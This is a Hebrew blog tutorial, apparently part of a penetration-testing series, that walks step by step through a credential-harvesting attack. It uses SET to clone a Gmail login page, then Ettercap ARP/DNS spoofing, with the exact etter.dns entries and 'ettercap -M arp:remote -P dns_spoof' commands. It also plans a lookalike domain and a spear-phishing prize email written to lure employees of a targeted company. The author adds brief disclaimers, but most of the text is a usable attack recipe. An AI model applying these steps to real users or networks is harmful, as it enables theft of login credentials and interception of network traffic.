Home אבטחת מידעPenetration Testing - Offense ביצוע Social Engineering ע”י SET ו Spear Phishing וביצוע DNS Spoofing

ביצוע Social Engineering ע”י SET ו Spear Phishing וביצוע DNS Spoofing

0 comment
נהנתם מהמאמר ? שתפו אותו!

כל הזכויות שמורות לטל בן שושן – Shushan.co.il

ביצוע Social Engineering ו Spear Phishing בעזרת Email וביצוע DNS Spoofing


על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit


על מנת להבין מה נעשה במאמר זה, נתחיל תחילה מ Phishing

מהמילה “דייג” המטרה של התוקף ב Phishing היא ל”דוג” את פרטיו של המשתמש, התוקף ישלח קישור מבלבל נאמר paypol.com שהשם מאוד דומה לאתר קיים כמו Paypal וזאת על מנת ל”עבוד” “לרמות” את המשתמש שיקיש על הקישור, כאשר יפתח את הקישור הוא יגיע לאתר דומה ל Paypal וברוב המקרים אם הזיוף טוב אז 1:1 דומה לאתר המקורי, כל מידע שיזין המשתמש בשם המשתמש וסיסמא ישלח לתוקף.
בסיום המשתמש יועבר לאתר המקורי, שם לא יבין מדוע לא התחבר ויחשוב שזה “סתם תקלה” ואז יתחבר לחשבון באמת ולא ידע שהמידע הסודי שלו עבר לתוקף.

דוגמה ל Phishing אמיתי שאני קיבלתי

Spear Phishing

אז מה ההבדל בין Phishing ל Spear Phishing ?
במייל שקיבלתי, ניתן להבחין שרשום Dear User ולא משו בסגנון Dear Tal זאת אומרת הודעת המייל הזו נשלחה בכמויות מסיביות להמון משתמשים ובתקווה שהם יזינו את חשבון הפייפאל שלהם והתוקף יוכל לעשות המון קניות באליקספרס.

Spear Phishing הוא למעשה הודעת תיוג, ממוקדת מטרה.
תארו לכם שאותו המשתמש רצה דווקא את החשבון שלי, הוא יכל לשלוח Dear Tal

הוא יכל לשלוח הודעה בנוסח הזה:


שלום טל בן שושן,

רצינו לעדכן אותך כי בחשבון הPaypal שלך נמצאה כתובת שלא נמצאת במאגר אצלנו.

הכתובת הרשומה היא “רחוב חיל התקשוב 10” , אנא התחבר לחשבונך ואמת את הכתובת, אם אינה נכונה אנא הגדר חדשה

בכבוד רב Paypal


כמובן שאת כתובת הרחוב יכול התוקף לברר אצל אחד מחברות הטלוויזיה וכו’ הוא יכול לבדוק מאגרי רישום (מאגר שנפרץ ב2006 וקיים אצל הרבה משתמשים) הוא יכול להכיר את התוקף, הוא יכול לשלוח הודעת מייל אמיתית למשתמש ולברר היכן גר ועוד דרכים נוספות בעולם ה Social Engineering  ולבסוף להשיג את הכתובת של המשתמש.

אם חברת Paypal באמת שלחה בעבר או לפני שנים מייל כזה התוקף יכול ממש להעתיק ולהדביק את אותו המייל ולהשתמש בנוסח שלו כך שיראה אמיתי ככל הניתן.
כך התוקף מטרגט לו מטרה מסוימת ומשקיע מאמץ רב בלהתאים את הודעת המייל אליו

Spear Phishing יכול להיות קבוצתי, כמו שאני הציג במאמר זה, התוקף יודע שחברת “אביב טלקום” עובדת עם חברת הנסיעות “שוש טוס” ותוקף משקיע בפרסומת ובאתר מתאימים.

בעזרת מאמר זה אציג כיצד התוקף מייצר אתר “מזוייף” שדומה לג’ימייל 1:1 ובו כל הנתונים עוברים אליו, ואימייל מסוג Spear Phishing קבוצתי

Spear Phishing – Gmail

דרישות:

  • Kali
  • מחשב ווינדוס לבדיקה

נפתח בקאלי את Social Engineering Toolkit

כעת נבחר ב 1

כעת נבחר ב2

נבחר ב3

כעת נוכל לשכפל אתר מהאינטרנט, אבל נבחר ב Template שכן הוא נראה מציאותי מאוד

נבחר 1

נאשר שזה כתובת הIP של Kali

נבחר 2 בגוגל שזה אתר ג’מייל

כעת נעבור למערכת ההפעלה Windows או בקאלי עצמו ונפתח את כתובת ה IP של קאלי

התוצאה:

בשביל הבדיקה נקיש שם משתמש וסיסמא

נראה שעברנו לגוגל המקורי

ניתן להבחין שקיבלנו את שם המשתמש והסיסמא שהקשנו

כמובן שאתם יכולים לזייף אתר אחר, אבל זו דוגמה טובה.

DNS Spoofing & Email Phishing

כעת נוכל לקנות דומיין (כמובן שקאלי או האתר שלכם נמצא על שרת עם כתובת IP חיצוני

הדומיין צריך להיות דומה ככל הניתן למקור אותו אתם רוצים לזייף, לרוב משתמשים בכתובת Subdomain על מנת לבלבל

קונים דומיין (או דומיין בחינם .tk) * כמובן שזה לא חוקי! נאמר עם השם

searchnowgoogle.com

ואחרי שמשייכים את הדומיין מגדירים בDNS Sub Domain בשם gmail , כך שהכתובת שמובילה לאתר ה”מזוייף שלנו” זה

gmail.searchnowgoogle.com

וכתובת זו מאוד מבלבלת, אותה מכניסים למייל (שהכנתי בהמשך דוגמה) ושולחים למשתמשים , קבוצת משתמשים שהחברה שלהם עובדת עם “שוש טורס”

אבל , אם אני מצליח להתחבר לרשת הארגונית, מרחוק WIFI או על ידי כבל, אוכל לזייף כתובת על ידי DNS Spoofing

DNS Spoofing מחליף את כתובת ה MAC של הכתובת IP של שרת ה DNS ובכך מרמה את המשתמשים.

כך שכאשר הם יקישו או יכנסו לאתר בשם google.com הם יכולים להגיע לשרת שלי.

תחילה נגדיר לקאלי, שנתונים שמגיעים אלינו הקאלי יכול לבצע להם Forward

echo 1 > /proc/sys/net/ipv4/ip_forward

כעת נאתר את Ettercap איתו נבצע את ה DNS Spoofing

locate etter.dns

נערוך את קובץ ההגדרות שלו

vi /etc/ettercap/etter.dns

נרד קצת למטה, ונוסיף שתי שורות חדשות

www.google.gmail.com A 192.168.31.162

google.gmail.com A 192.168.31.162

זאת אומרת שכאשר משתמשים ינסו לגלוש לאתר www.google.gmail.com או בלי WWW

כעת נקיש את הפקודה (אם אנו רוצים לבצע זאת לכל הרשת)

ettercap -T -q -M arp:remote -P dns_spoof

אם אנחנו רוצים רק לכתובת מסוימת

ettercap -T -q -M arp:remote /192.168.31.150// /// -P dns_spoof

פקודה זו מפעילה את ARP Spoof לרשת בה אתם נמצאים, ומבצע גם DNS Spoof לשרת ה DNS של המשתמשים

כעת פתחו את הדפדפן בווינדוס (אם לא עובד הקישו ipconfig /flushdns על מנת למחוק את ה Cache ואז פתחו שוב את הדפדפן)

כעת בדקו שהכל עובד, הקישו סתם משתמש וסיסמא

הוא יעביר אותנו שוב אוטומטית לאתר המקורי של גוגל

כעת גם ה ettercap תפס את הסיסמאות

וגם ה SET

כעת הכנתי “שלט” “תמונה” של זכייה בפרס! בטיסה!

  • אין להשתמש בתמונה זו על מנת לבצע פישינג Phishing אמיתי בשום צורה!!

כעת אכניס אותה למייל שלי ואכתוב למטה, לחצו כאן – בלחצו כאן אכניס את הקישור לשרת שלי

ל:

google.gmail.com

שבסופו של דבר יגיע ל

192.168.31.162

בעזרת ה DNS Spoof

שלחתי את המייל למשתמש

המשתמש לוחץ על “לחץ כאן לקבלת הפרס”

הבחינו כי זה מ”שוש טוס” חברה שעובדת צמוד לחברה אליה שלחתי את המייל (בדיוני , כן…)

המשתמש לוחץ על הקישור, ומגיע לאתר

הבחינו בכתובת, נראית מציאותית …

כעת הקישו שם משתמש וסיסמא והם יגיעו ישירות לקאלי שלכם.

מאמרים קשורים

Leave a Comment